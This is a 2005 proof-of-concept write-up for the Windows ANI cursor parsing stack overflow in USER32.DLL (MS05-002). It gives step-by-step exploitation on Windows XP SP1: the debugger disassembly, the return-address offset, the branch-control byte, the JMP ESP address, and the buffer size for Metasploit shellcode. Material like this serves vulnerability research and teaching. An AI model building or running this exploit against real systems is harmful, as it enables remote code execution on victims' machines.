Windows ANI File Parsing Proof Of Concept
-----------------------------------------

Advisory Date (By eEye) :   11 January 2005
Proof of Concept Date :     12 January 2005
Author :                    Assaf Reshef <assaf404 at yahoo dot com>

Original POC URL :          http://underwar.livedns.co.il/projects/ani/
Tested On :                 Windows XP SP1  (Should not work on others)

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Disclaimer
----------
This demostration is for educational purpose only. Please don't use it for illegal actions.
I will take no responsibility for any action caused by the use of this information. Use it at your own risk.

Introduction
------------
This document demostrate an exploit of vulnerability in USER32.DLL's handling of Windows animated cursor (.ani) files that will allow a remote attacker to reliably overwrite the stack with arbitrary data and execute arbitrary code.

Step 1: Learning & Crashing
----------------------------

Understanding of the exploiting process required knowledge of the ANI file specification [3].

we take a simple ANI file (vanisher.ani) from c:\windows\cursors\, using an hex editor, we change the vulnerable field (AnimationHeaderBlock length) of the ANI to FFFFFFFF. Result: explorer crashes. checking what happens using olly, we found that explorer crashed here (in user32.dll) :
77D72E4D     F3:A5          REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI]

Seems like we are copying too much information. After several tries, we figured that this command is writing to a changing memory area, so we will have to use a fixed return address (jmp esp).

Note : before our interesting call (the one that glitches), we move (at line 77D72E30) the buffer length into EDX. the only thing before copying the string is the command SHR ECX,2 (dividing the length by 4, becuase we are copying dwords) - we dont have to bother about it.

Step 2: Finding a return address overwrite
--------------------
Stepping through the memory which gets overflowed, we find that the return address of the vulnerable function is overflowed by the dword at offset 0x30 from our buffer.
So our fey return address should be placed 0x30 bytes after the buffer starts.
 
Now we set the 0x30 DWORD to AAAAAAAA and lets look when it will get called.

Step 3: Looking for jump
-------------------------
After the string copy, the first time explorer touches our written value is here:

77D73213  TEST BYTE PTR DS:[EDI+4],1
77D73217  JNZ USER32.77D8296E
....

and this code eventually returns here:

77D731BE   . 85C0           TEST EAX,EAX
77D731C0   . 74 32          JE SHORT USER32.77D731F4
77D731C2   . F645 F4 01     TEST BYTE PTR SS:[EBP-C],1     <--------- [EBP-C] = Offset 0x20 inside our buffer.
77D731C6   . 74 2C          JE SHORT USER32.77D731F4       <--------- We want to jump here!
77D731C8   . 837D D8 00     CMP DWORD PTR SS:[EBP-28],0
77D731CC   . 74 26          JE SHORT USER32.77D731F4

We control the TEST result (its pointing into our buffer), and checking the jump revealed that it will eventually jump to our code. So lets set 0x20 to 0x02, to assure our jump.

The critical jump is here :
77D731ED   > 5F             POP EDI
77D731EE   . 5E             POP ESI
77D731EF   . 5B             POP EBX
77D731F0   . C9             LEAVE
77D731F1   . C2 1800        RETN 18       <------------- Here

Remember that the address for the jump is in offset 0x30 in our code. Since memory is dynamic, we will use the fixed address 77DA73E0 in user32.dll for the JMP ESP (Thanks Metasploit).

Step 4: Writing Final Things
-----------------------------
Getting the shell from metasploit (Thanks again for saving me some time), and we are in the business.

Lets calculate whats the buffer length : Our shellcode is 0x13e bytes + 0x2e9 NOP's + 0x34 for the header => The total buffer is 0x45c Bytes.

Values Summary
--------------
AnimationHeaderBlock length = 0x45c
Offset 0x30 in our buffer   = 77DA73E0 (0xE073DA77)
Offset 0x20 in our buffer   = 0x02 (To make the TEST work)

Thanks
-------
Nir Adar
evilbitz

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

References
----------

[1] eEye Original Advisory
    http://www.eeye.com/html/research/advisories/AD20050111.html
 
[2] Microsoft Security Bulletin MS05-002
    http://www.microsoft.com/technet/security/bulletin/MS05-002.mspx
 
[3] ANI File Format
    http://underwar.livedns.co.il/projects/ani/ani_file_format.txt
    Originally from http://www.wotsit.org/download.asp?f=ani, but they block direct access.